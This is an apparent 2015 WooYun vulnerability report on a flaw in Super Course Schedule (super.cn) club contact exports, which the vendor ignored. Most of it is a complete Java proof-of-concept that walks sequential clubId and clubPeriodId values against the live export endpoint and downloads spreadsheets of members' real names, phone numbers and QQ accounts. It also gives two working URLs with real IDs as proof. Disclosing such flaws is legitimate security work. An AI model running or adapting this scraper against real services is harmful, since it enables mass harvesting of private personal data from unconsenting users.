当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138205

漏洞标题:超级课程表某主营业务逻辑缺陷导致全体用户真实姓名手机和QQ隐私泄露

相关厂商:super.cn

漏洞作者: dragonwing

提交时间:2015-08-31 17:39

修复时间:2015-09-05 17:40

公开时间:2015-09-05 17:40

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

超级课程表某主营业务,泄露全体用户真实姓名和手机和QQ等隐私信息。

详细说明:

超级社团是超级课程表主营业务,截止至目前已有4万多个社团加入。


主要功能之一就是:方便用户寻找社团内其他用户的联系方式,包括QQ和手机号码和短号,其中还包括用户的院系和社团名称和社团职位等信息,这些信息对于社团内部成员来说是公开的,但对于社团外的人来说,这便是隐私。
进入超级社团后有一个大大的按钮——“导出通讯录”
链接格式如下:

http://club.super.cn/Excel/exportClubContacts.xls?clubId=&clubPeriodId=


经简单研究发现clubId为社团id,clubPeriodId为社团周期id。
当一个社团被新建时,clubId自增,clubPeriodId也自增。
当一个社团被删除时,clubId自减,clubPeriodId不变。
更多详细规则,就不在此阐述,直接上POC,以下是获取获取正确的clubId和clubPeriodId对应关系的代码(已避免盲目暴力破解):

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.CookieManager;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
public class SuperClubTryClubPeriodId {
	CookieManager ca = new CookieManager();
	String sessionID = "";
	int ClubPeriodId;
	int ClubId;
	int num;
	int tempClubId;
	int tempClubPeriodId;
	int tempNum;
	int tempWhetherRecord;
	
	public int getClubPeriodId() {
		return ClubPeriodId;
	}
	public void setClubPeriodId(int ClubPeriodId) {
		this.ClubPeriodId = ClubPeriodId;
	}
	
	public int getNum() {
		return num;
	}
	public void setNum(int num) {
		this.num = num;
	}
	public int getClubId() {
		return ClubId;
	}
	public void setClubId(int ClubId) {
		this.ClubId = ClubId;
	}
	public int gettempClubPeriodId() {
		return tempClubPeriodId;
	}
	public void settempClubPeriodId(int tempClubPeriodId) {
		this.tempClubPeriodId = tempClubPeriodId;
	}
	
	
	
	
	
	
	public static void main(String args[]){
		SuperClubTryClubPeriodId SCtryCP= new SuperClubTryClubPeriodId();
		SCtryCP.setNum(29);
		SCtryCP.setClubPeriodId(650);
		SCtryCP.settempClubPeriodId(SCtryCP.getClubPeriodId());
		Object[] ClubIdtemp=getClubIdTxt();
		for (; SCtryCP.getNum() < ClubIdtemp.length; ) {
			SCtryCP.setClubId(chooseClubId(SCtryCP.getNum()));
			SCtryCP.crack(SCtryCP.getClubId(), SCtryCP.getClubPeriodId());
		}
		
	}
	
	public void crack(int ClubId,int ClubPeriodId){
		SuperClubTryClubPeriodId SCtryCP= new SuperClubTryClubPeriodId();
	    	int count = 0;
	    	
	    	if (this.ClubPeriodId-this.tempClubPeriodId<100) {
	    		if (this.tempWhetherRecord==0){
	    			this.tempNum=this.num;
	    			this.tempClubPeriodId=this.ClubPeriodId;
	    			this.tempWhetherRecord=1;
	    		}
	    		
	    		String url="http://Club.super.cn/Excel/exportClubContacts.xls?clubId="+ClubId+"&clubPeriodId="+ClubPeriodId;
	    		
			if (judgeExists(url)==true){
				String EXCEL="";
				EXCEL=SCtryCP.get(url, "utf-8");
				String key="Arial1";
			    	int index = 0;
			    	while((index=EXCEL.indexOf(key,index))!=-1){
			    		index = index+key.length();
			    		count++;
			    	}
			    	if (count==4) {
			    		System.out.println("成功:ClubId:"+ClubId+","+"ClubPeriodId:"+ClubPeriodId);
			    		this.num++;
			    		this.tempWhetherRecord=0;
			    	} else if (count==5){
			    	}
		    		this.ClubPeriodId++;
			    	
			} else {
		    		System.out.println("此ClubId:"+ClubId+"不存在通讯录数据");
				this.num++;
			}
	    		
	    	} else {
	    		System.out.println("此ClubId:"+ClubId+"无规律需要暴力破解");
	    		this.tempNum=this.tempNum+1;
	    		this.num=this.tempNum;
	    		this.tempClubPeriodId=this.tempClubPeriodId-50;
	    		this.ClubPeriodId=this.tempClubPeriodId;
	    	}
	}
	
	
	
	
	public static int chooseClubId(int j){
		Object[] ClubIdtemp=getClubIdTxt();
		int ClubIdNum = 0;
		
		try{
			ClubIdNum=Integer.parseInt((String) ClubIdtemp[j]);
		}
		catch (NumberFormatException e){
		}
		return ClubIdNum;
	}
	
	public static Object[] getClubIdTxt(){
		
		Scanner sc = null;
		Object[] temp = null;
		try {
			sc = new Scanner(new File("F:/超级ClubId.txt"));
			String str = null;
			List<String> list = new ArrayList<String>();
			while (sc.hasNextLine()) {
				str = sc.nextLine();
				list.add(str);
			}
	
			temp = list.toArray();
			
		}
		
		catch (FileNotFoundException e) {
		}
		finally {
			if(sc !=null)sc.close();
		}
		return temp;
	}
	
	
	static boolean judgeExists(String URLName) {
		try {
			HttpURLConnection.setFollowRedirects(false);
			HttpURLConnection con = (HttpURLConnection) new URL(URLName).openConnection();
			con.setRequestMethod("GET");
			return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
		} catch (Exception e) {
			e.printStackTrace();
			return false;
		}
	}
	
	
	public String get(String url, String charset) {
		try {
			String key = "";
			String cookieVal = "";
			URL httpURL = new URL(url);
			HttpURLConnection http = (HttpURLConnection) httpURL
					.openConnection();
			if (!sessionID.equals("")) {
				http.setRequestProperty("Cookie", sessionID);
			}
			for (int i = 1; (key = http.getHeaderFieldKey(i)) != null; i++) {
				if (key.equalsIgnoreCase("set-cookie")) {
					cookieVal = http.getHeaderField(i);
					cookieVal = cookieVal.substring(
							0,
							cookieVal.indexOf(";") > -1 ? cookieVal
									.indexOf(";") : cookieVal.length() - 1);
					sessionID = sessionID + cookieVal + ";";
				}
			}
			BufferedReader br = new BufferedReader(new InputStreamReader(
					http.getInputStream(), charset));
			StringBuilder sb = new StringBuilder();
			String temp = null;
			while ((temp = br.readLine()) != null) {
				sb.append(temp);
				sb.append("\n");
			}
			br.close();
			return sb.toString();
		} catch (Exception e) {
			e.printStackTrace();
		}
		return null;
	}


漏洞证明:

http://club.super.cn/Excel/exportClubContacts.xls?clubId=28027&clubPeriodId=29029

QQ截图20150831160701.jpg


http://club.super.cn/Excel/exportClubContacts.xls?clubId=23784&clubPeriodId=24699

QQ截图20150831161346.jpg

修复方案:

从clubId处就应该开始加密,防止暴力破解

版权声明:转载请注明来源 dragonwing@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-05 17:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无